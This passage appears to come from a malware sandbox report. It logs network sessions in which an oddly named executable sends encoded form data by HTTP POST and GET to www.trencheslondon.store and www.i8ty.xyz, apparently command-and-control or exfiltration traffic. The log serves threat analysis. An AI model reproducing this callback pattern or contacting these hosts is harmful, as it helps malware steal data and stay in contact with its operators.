                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.trencheslondon.store
                                                                  Referer: http://www.trencheslondon.store/bba0/
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 223
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                                  Data Raw: 56 74 38 70 4e 54 3d 2b 30 46 68 65 6e 67 58 4d 72 53 77 57 32 2f 72 59 30 38 4a 6f 57 44 31 57 52 39 59 30 67 50 57 55 45 72 2b 34 6f 63 6f 37 72 75 42 6c 4c 58 58 41 5a 78 33 57 64 77 38 79 6f 72 68 6c 38 6a 69 39 74 6a 59 42 46 46 36 79 2b 6b 51 69 4e 79 46 53 36 50 37 30 42 41 45 50 4a 54 71 32 65 68 59 43 39 7a 4d 35 66 42 6c 4c 52 44 64 43 74 2b 58 79 58 2b 49 36 49 42 33 50 34 38 54 4e 62 6a 63 6e 36 42 54 50 62 68 75 64 35 67 74 51 62 4d 66 6c 7a 5a 2b 77 4c 57 2f 41 73 7a 4a 4f 56 65 4d 77 43 47 38 35 6d 6f 54 2f 73 39 79 76 56 64 59 68 55 45 76 2b 4f 43 51 4c 48 36 44 6e 53 30 7a 68 6a 4c 69 73 33 5a 69 45 65 6c 4c 35 66 72 34 48 7a 48 77 4d 73 4d 3d
                                                                  Data Ascii: Vt8pNT=+0FhengXMrSwW2/rY08JoWD1WR9Y0gPWUEr+4oco7ruBlLXXAZx3Wdw8yorhl8ji9tjYBFF6y+kQiNyFS6P70BAEPJTq2ehYC9zM5fBlLRDdCt+XyX+I6IB3P48TNbjcn6BTPbhud5gtQbMflzZ+wLW/AszJOVeMwCG85moT/s9yvVdYhUEv+OCQLH6DnS0zhjLis3ZiEelL5fr4HzHwMsM=


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  19192.168.2.4500213.33.130.190803632C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 11, 2024 16:48:00.199784994 CEST10857OUTPOST /bba0/ HTTP/1.1
                                                                  Host: www.trencheslondon.store
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.trencheslondon.store
                                                                  Referer: http://www.trencheslondon.store/bba0/
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 10303
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                                  Data Raw: 56 74 38 70 4e 54 3d 2b 30 46 68 65 6e 67 58 4d 72 53 77 57 32 2f 72 59 30 38 4a 6f 57 44 31 57 52 39 59 30 67 50 57 55 45 72 2b 34 6f 63 6f 37 72 6d 42 6c 35 66 58 42 36 5a 33 52 64 77 38 37 49 72 69 6c 38 6a 2f 39 74 37 63 42 46 5a 71 79 34 6f 51 6a 76 36 46 43 59 6e 37 68 78 41 45 48 70 54 33 79 65 68 33 43 35 65 4c 35 65 39 6c 4c 52 44 64 43 76 6d 58 30 46 57 49 34 49 42 30 4d 34 38 66 48 37 6a 30 6e 36 5a 44 50 62 6b 4d 64 70 41 74 51 37 63 66 67 42 78 2b 76 37 57 39 44 73 79 63 4f 56 43 58 77 43 7a 46 35 6c 30 74 2f 75 68 79 73 67 39 48 6b 58 74 35 68 39 4b 31 57 46 6d 31 2f 53 5a 32 6e 6b 2f 44 6f 79 39 5a 57 2b 39 37 32 4f 2b 50 58 42 6a 47 52 5a 7a 33 4c 78 42 5a 55 32 44 79 2f 76 57 33 63 4e 43 63 36 68 74 62 73 30 42 31 72 32 54 47 41 4f 34 2f 71 63 61 54 2b 49 44 44 61 59 77 55 2f 45 52 39 4e 34 42 30 5a 52 52 72 5a 54 50 35 37 58 75 53 35 73 50 31 4c 71 38 55 53 30 6a 30 64 7a 32 46 42 51 38 33 6a 75 2b 74 49 6c 36 4a 32 74 33 52 46 77 37 2f 5a 39 64 47 43 70 67 72 68 45 33 65 6a 59 33 [TRUNCATED]
                                                                  Data Ascii: Vt8pNT=+0FhengXMrSwW2/rY08JoWD1WR9Y0gPWUEr+4oco7rmBl5fXB6Z3Rdw87Iril8j/9t7cBFZqy4oQjv6FCYn7hxAEHpT3yeh3C5eL5e9lLRDdCvmX0FWI4IB0M48fH7j0n6ZDPbkMdpAtQ7cfgBx+v7W9DsycOVCXwCzF5l0t/uhysg9HkXt5h9K1WFm1/SZ2nk/Doy9ZW+972O+PXBjGRZz3LxBZU2Dy/vW3cNCc6htbs0B1r2TGAO4/qcaT+IDDaYwU/ER9N4B0ZRRrZTP57XuS5sP1Lq8US0j0dz2FBQ83ju+tIl6J2t3RFw7/Z9dGCpgrhE3ejY3ISSu/cZrEvV9CIaPq354qQNaTeuXqqxBhQEOGfYqodsrCUgvh3eN/820wu/KMWD4yx0r62BADn9/jQvku6pnPu3NU5RH6/imuBgUxAFR5k7iCl7l1CL09mWoD/cRJVtBZ3QoC2M6FAzYv+K28uRu7QRZRoqTOe7NF1cLUVVEIzzROiovn8xcyJN3txZ96PbP9M8Hv/cXHrYSQog9WuGOarcVeMwTbzkceHCNgG1+BmTlr5JXm9HqcADrP5zn3xPyfMb0/urqvh55R+6p2MF7nOD0SQc7cVAagmusXMGaHFokaC2iMoyenBIuENMzpeMiDPQ94px1FWKPFvRI8Bzc+pXVnQjNOJgpsJW8xshmd2beDYdYeiaOhYBbHmURGrUZTiL5Fd6MJ1LvEZP75+skh50VKfoY9sIEsJ4CzPAalrfT6ruE9bf0hxjlZE9ZCLTc1IW7u+sc+IWlVNdU+QWUZWq7YlhF5OAmUHCz1m35uBNgPJR/tAoSemtOfQnbfS23jpZkLISBYopGmSZxLWWl/l4IvQpQsgk0PqW3OWJJ2o1TfYQTZbsQAyXLzcqSVbuRV4VpbnpqEnIfYZSRX/7O5fQ5U7/oQqQiiyXRRZ5r3zeWhJuv6gA43PpQpbkZSaQhNta1IrCWOejQKxjkA7i+yjLK/uxv8J9Q3y [TRUNCATED]


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  20192.168.2.4500223.33.130.190803632C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 11, 2024 16:48:02.793768883 CEST471OUTGET /bba0/?Vt8pNT=z2tBdSkYWISVZlGeY1UMjB+aahxirAP0BGL3+4ox4Yqg2ZTTHsJ+XsYwiumYoM/4lsnVRmhb/JIyqNziYYbWgSouB4vi/+UmCom1xZAxGA7QHOLM5wPW2IM=&e4x=ktCxONu0 HTTP/1.1
                                                                  Host: www.trencheslondon.store
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                                  Oct 11, 2024 16:48:03.253010035 CEST395INHTTP/1.1 200 OK
                                                                  Server: openresty
                                                                  Date: Fri, 11 Oct 2024 14:48:03 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 255
                                                                  Connection: close
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 56 74 38 70 4e 54 3d 7a 32 74 42 64 53 6b 59 57 49 53 56 5a 6c 47 65 59 31 55 4d 6a 42 2b 61 61 68 78 69 72 41 50 30 42 47 4c 33 2b 34 6f 78 34 59 71 67 32 5a 54 54 48 73 4a 2b 58 73 59 77 69 75 6d 59 6f 4d 2f 34 6c 73 6e 56 52 6d 68 62 2f 4a 49 79 71 4e 7a 69 59 59 62 57 67 53 6f 75 42 34 76 69 2f 2b 55 6d 43 6f 6d 31 78 5a 41 78 47 41 37 51 48 4f 4c 4d 35 77 50 57 32 49 4d 3d 26 65 34 78 3d 6b 74 43 78 4f 4e 75 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Vt8pNT=z2tBdSkYWISVZlGeY1UMjB+aahxirAP0BGL3+4ox4Yqg2ZTTHsJ+XsYwiumYoM/4lsnVRmhb/JIyqNziYYbWgSouB4vi/+UmCom1xZAxGA7QHOLM5wPW2IM=&e4x=ktCxONu0"}</script></head></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  21192.168.2.450023207.154.246.21803632C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 11, 2024 16:48:08.327770948 CEST719OUTPOST /0gyy/ HTTP/1.1
                                                                  Host: www.i8ty.xyz
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.i8ty.xyz
                                                                  Referer: http://www.i8ty.xyz/0gyy/
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 203
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                                  Data Raw: 56 74 38 70 4e 54 3d 6b 65 73 42 65 59 76 4f 75 47 44 6c 61 78 58 6b 44 67 62 68 30 31 6a 73 42 52 79 6c 6e 6b 48 63 69 67 49 4f 50 66 44 37 36 6f 44 6f 4a 30 67 42 52 65 6b 7a 38 46 5a 56 55 48 74 52 79 67 4d 49 70 73 70 68 2f 49 74 58 6b 44 50 59 6a 44 41 77 51 75 4a 5a 53 2f 71 64 4c 36 48 57 50 34 58 54 43 70 69 62 37 7a 2f 61 47 50 36 41 6f 6f 2b 66 4c 45 38 70 64 2f 34 31 6d 6d 6c 55 70 2f 50 79 61 59 71 69 73 6c 68 52 54 48 6a 41 53 33 38 34 58 53 45 34 2f 33 68 6a 4a 2f 48 6b 36 2f 67 79 4d 2b 4e 76 66 42 70 42 4d 76 47 75 34 77 6b 47 64 7a 67 54 42 57 49 74 71 42 39 2b 57 6d 41 45 32 67 3d 3d
                                                                  Data Ascii: Vt8pNT=kesBeYvOuGDlaxXkDgbh01jsBRylnkHcigIOPfD76oDoJ0gBRekz8FZVUHtRygMIpsph/ItXkDPYjDAwQuJZS/qdL6HWP4XTCpib7z/aGP6Aoo+fLE8pd/41mmlUp/PyaYqislhRTHjAS384XSE4/3hjJ/Hk6/gyM+NvfBpBMvGu4wkGdzgTBWItqB9+WmAE2g==
                                                                  Oct 11, 2024 16:48:08.964145899 CEST1236INHTTP/1.1 404 Not Found
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 11 Oct 2024 14:48:08 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  X-Trace: 2BFCE5A043D4DA88C1C7A994DA64FEC1EC6CA33F30F37C75A60D77B67800
                                                                  Set-Cookie: _csrf=ddeeaf19bd497098f1c9660f9137199be787e713b15b53910197d0e6a0f29eefa%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22CdwJzH2l7slEGdMPw4J6H2UlrSkBzCws%22%3B%7D; path=/; HttpOnly
                                                                  Data Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 64 44 6c 45 55 76 53 36 35 5f 4f 34 52 4a 48 4c 6d 4a 62 48 75 57 35 51 4b 73 77 31 35 6e 34 61 35 68 4d 49 4e 77 45 6a 66 79 41 33 58 54 4d 59 6a 76 4c 56 6e 34 38 33 5f 59 37 66 38 6f 72 70 47 57 52 67 2d 6e 33 55 4b 33 61 55 51 47 4e 31 65 32 41 49 55 77 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f [TRUNCATED]
                                                                  Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="csrf-param" content="_csrf"> <meta name="csrf-token" content="dDlEUvS65_O4RJHLmJbHuW5QKsw15n4a5hMINwEjfyA3XTMYjvLVn483_Y7f8orpGWRg-n3UK3aUQGN1e2AIUw=="> <title>Not Found (#404)</title> <link href="/css/site.css" rel="stylesheet"></head><body><div class="wrap"> <div class="site-error"> <h1>Not Found (#404)</h1> <div class="alert alert-danger"> Page not found. </div> <p> The above error occurred while the Web server was processing your request. </p> <p> Please contact us if you think this is a server error. Thank you. </p></div></di
                                                                  Oct 11, 2024 16:48:08.964306116 CEST27INData Raw: 76 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: v></body></html>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  22192.168.2.450024207.154.246.21803632C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 11, 2024 16:48:10.873336077 CEST739OUTPOST /0gyy/ HTTP/1.1
                                                                  Host: www.i8ty.xyz
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.i8ty.xyz
                                                                  Referer: http://www.i8ty.xyz/0gyy/
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 223
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                                  Data Raw: 56 74 38 70 4e 54 3d 6b 65 73 42 65 59 76 4f 75 47 44 6c 61 53 50 6b 43 44 6a 68 38 31 6a 6a 45 52 79 6c 73 45 48 51 69 67 30 4f 50 65 33 72 76 4b 58 6f 4a 56 38 42 53 62 51 7a 2f 46 5a 56 41 33 74 55 76 77 4e 6c 70 73 30 63 2f 4a 42 58 6b 44 4c 59 6a 47 38 77 58 64 52 57 55 76 71 54 48 61 48 59 51 6f 58 54 43 70 69 62 37 7a 71 2f 47 50 69 41 72 59 4f 66 45 47 55 71 65 2f 34 79 75 47 6c 55 6a 76 50 49 61 59 71 51 73 6b 39 72 54 46 72 41 53 31 6b 34 58 41 38 37 78 48 68 6c 58 2f 47 4b 33 38 64 47 4a 66 73 63 5a 48 68 76 47 4d 72 4c 39 32 31 63 4d 43 42 45 54 57 73 65 33 47 30 4b 62 6c 39 4e 74 6d 6d 30 41 4e 6b 76 57 58 74 62 69 31 35 5a 59 33 49 53 4c 2f 63 3d
                                                                  Data Ascii: Vt8pNT=kesBeYvOuGDlaSPkCDjh81jjERylsEHQig0OPe3rvKXoJV8BSbQz/FZVA3tUvwNlps0c/JBXkDLYjG8wXdRWUvqTHaHYQoXTCpib7zq/GPiArYOfEGUqe/4yuGlUjvPIaYqQsk9rTFrAS1k4XA87xHhlX/GK38dGJfscZHhvGMrL921cMCBETWse3G0Kbl9Ntmm0ANkvWXtbi15ZY3ISL/c=
                                                                  Oct 11, 2024 16:48:11.557765007 CEST1236INHTTP/1.1 404 Not Found
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 11 Oct 2024 14:48:11 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  X-Trace: 2BC80F9409633CC19BA4248B29B6CA3C138EA349CF2E1A4C13F5246AB600
                                                                  Set-Cookie: _csrf=7b4d071a38956ce7691482f1f89bec8321692882b4bcbe0317fea5ec26cf14eaa%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%222qkML5zSYmVAtokF6VRpPh498aW0bIrU%22%3B%7D; path=/; HttpOnly
                                                                  Data Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 50 36 34 70 6a 32 2d 59 2d 55 36 50 68 4e 76 34 75 50 54 30 41 69 6b 2d 68 45 49 30 50 6e 56 51 30 76 74 2d 4c 39 54 42 31 69 6f 4e 33 30 4c 43 49 36 32 44 48 64 62 70 6a 62 6e 4d 6d 35 39 45 48 32 6a 57 4d 6d 52 57 51 57 6e 71 6d 69 6b 66 74 6f 69 6b 66 77 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f [TRUNCATED]
                                                                  Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="csrf-param" content="_csrf"> <meta name="csrf-token" content="P64pj2-Y-U6PhNv4uPT0Aik-hEI0PnVQ0vt-L9TB1ioN30LCI62DHdbpjbnMm59EH2jWMmRWQWnqmikftoikfw=="> <title>Not Found (#404)</title> <link href="/css/site.css" rel="stylesheet"></head><body><div class="wrap"> <div class="site-error"> <h1>Not Found (#404)</h1> <div class="alert alert-danger"> Page not found. </div> <p> The above error occurred while the Web server was processing your request. </p> <p> Please contact us if you think this is a server error. Thank you. </p></div></di
                                                                  Oct 11, 2024 16:48:11.557816982 CEST27INData Raw: 76 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: v></body></html>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  23192.168.2.450025207.154.246.21803632C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 11, 2024 16:48:13.425134897 CEST10821OUTPOST /0gyy/ HTTP/1.1
                                                                  Host: www.i8ty.xyz
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.i8ty.xyz
                                                                  Referer: http://www.i8ty.xyz/0gyy/
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 10303
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                                  Data Raw: 56 74 38 70 4e 54 3d 6b 65 73 42 65 59 76 4f 75 47 44 6c 61 53 50 6b 43 44 6a 68 38 31 6a 6a 45 52 79 6c 73 45 48 51 69 67 30 4f 50 65 33 72 76 4b 76 6f 4a 48 59 42 53 34 34 7a 2b 46 5a 56 63 6e 74 56 76 77 4d 6e 70 73 39 62 2f 4a 63 67 6b 41 6a 59 6a 6b 45 77 57 73 52 57 64 76 71 54 59 71 48 56 50 34 58 38 43 70 79 66 37 7a 36 2f 47 50 69 41 72 65 69 66 4e 30 38 71 59 2f 34 31 6d 6d 6c 41 70 2f 4f 6e 61 59 69 41 73 6b 49 4a 54 32 7a 41 52 56 30 34 56 7a 45 37 7a 6e 68 6e 44 66 47 6b 33 38 52 5a 4a 66 68 6e 5a 48 39 46 47 50 33 4c 78 7a 45 67 57 57 31 49 49 56 38 32 72 45 6b 62 54 32 78 64 71 6b 75 4e 47 2f 45 48 4c 6a 39 75 6d 33 51 38 46 32 49 61 4a 61 41 43 77 39 50 37 33 45 57 42 4f 63 6c 6b 57 73 50 50 7a 6d 6e 53 4d 6d 6c 48 77 38 79 6e 75 46 51 35 61 7a 57 4a 64 32 58 42 49 57 45 49 47 31 55 4e 6e 6c 66 77 34 61 54 6a 6c 67 64 61 55 66 58 66 6e 48 39 74 2f 54 30 56 45 49 7a 50 43 4b 4d 61 35 68 59 68 4a 45 78 61 32 4e 6e 56 41 6f 73 68 4d 45 39 38 35 45 6d 56 69 35 62 67 35 4b 66 62 51 6e 48 [TRUNCATED]
                                                                  Data Ascii: Vt8pNT=kesBeYvOuGDlaSPkCDjh81jjERylsEHQig0OPe3rvKvoJHYBS44z+FZVcntVvwMnps9b/JcgkAjYjkEwWsRWdvqTYqHVP4X8Cpyf7z6/GPiAreifN08qY/41mmlAp/OnaYiAskIJT2zARV04VzE7znhnDfGk38RZJfhnZH9FGP3LxzEgWW1IIV82rEkbT2xdqkuNG/EHLj9um3Q8F2IaJaACw9P73EWBOclkWsPPzmnSMmlHw8ynuFQ5azWJd2XBIWEIG1UNnlfw4aTjlgdaUfXfnH9t/T0VEIzPCKMa5hYhJExa2NnVAoshME985EmVi5bg5KfbQnHtV2HJCyP2VPtzel98pkjqlW8fzbE0bhQpN2GW0tEck/2mjFmB8tXjYs/OJejYVQ+Wd394hU62zrmLk8gVQ+ez1W2WFeuyDdBuLhOfIgl0qcApIkB2eNPDwjVCFaRHPxTnGZeVB1LC33cjgPezBxq+WfV/y9meV2tDBxJ/BTwNiXnx9dW0Q7GBZ62DttbndRbk72RPjHw8Q6B+8lSsAvIxyKIxKwIXWEoorCstjGxtO2owyBkwLP2duc+a6YWLF0ZR5JlTYziOatOIG+kwSAzmqSRYQc5+KTrTX1E7pFxS6U9lm5tiectOtTFFmX2Kdyg4gRs/rJVbKHgaS0UzDwdIQNIRTXasgcRWP+zMn76GA0/gkLHKH0IlZiWNiz9Xr6u3V9zW+yRPfD3A2viUGfuOyUuztZSBEIMlTIYR1hkgUGMbzxRrIlhmgWwxibRHvvPj2syVo9yf4Yj6ZkyrNnAx2L0pdUl2G/Y/rz2Oe4rOxvewdSqBTUG3A1BjB5wZfkB4mg7qk1eYD2QcnVb6DIA1zaAc9JYy6z8zqyBiB/kWHC64lUq03lXGi3wGjBOvQqi+7tGw6YvubvcHY15RGT4Ks6BIse7K7+hzMcEeB3KerxPo3lE8XONR7H4ZnZX/pabFxV4IOiE4gTUp7bqidgm+2a0bIBVDiXqfM [TRUNCATED]
                                                                  Oct 11, 2024 16:48:14.037837029 CEST1236INHTTP/1.1 404 Not Found
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 11 Oct 2024 14:48:13 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  X-Trace: 2B9BD6AA89CE29090D0389CDF341A5E18A6E39E8E2A24B305311DBF83800
                                                                  Set-Cookie: _csrf=5dcbb179e6dce9e2a23c8e888aaf3f12674e839126835424f7c66abc3fcb3c79a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%223-AGKKWEDQR4bmHqsr5Rdz1TuoMlPoju%22%3B%7D; path=/; HttpOnly
                                                                  Data Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 32 79 33 48 44 30 39 6b 32 5f 5f 31 76 2d 76 6d 41 77 6f 33 55 45 53 54 76 6c 6a 34 5a 46 79 2d 62 37 37 48 71 6e 35 34 49 6f 72 6f 41 49 5a 49 42 43 2d 4d 75 72 48 75 75 64 4a 68 5a 33 38 68 4e 2d 47 4c 43 70 77 65 62 65 6f 61 30 59 72 47 4c 68 64 49 5f 77 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f [TRUNCATED]
                                                                  Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="csrf-param" content="_csrf"> <meta name="csrf-token" content="2y3HD09k2__1v-vmAwo3UESTvlj4ZFy-b77Hqn54IoroAIZIBC-MurHuudJhZ38hN-GLCpwebeoa0YrGLhdI_w=="> <title>Not Found (#404)</title> <link href="/css/site.css" rel="stylesheet"></head><body><div class="wrap"> <div class="site-error"> <h1>Not Found (#404)</h1> <div class="alert alert-danger"> Page not found. </div> <p> The above error occurred while the Web server was processing your request. </p> <p> Please contact us if you think this is a server error. Thank you. </p></div></di
                                                                  Oct 11, 2024 16:48:14.038260937 CEST27INData Raw: 76 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: v></body></html>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  24192.168.2.450026207.154.246.21803632C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 11, 2024 16:48:15.970957994 CEST459OUTGET /0gyy/?Vt8pNT=pcEhds/h42nAYAT0LBaH8yStEyuK9E/vhBYbG/7jpbqcIU9VeO8n0URcBUZr7wQGt8dA+7YpmgvBimgGVM12DtGPEZbYI7iEEo2c2QS/At3BiK+lDzdQYd4=&e4x=ktCxONu0 HTTP/1.1
                                                                  Host: www.i8ty.xyz
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Connection: close
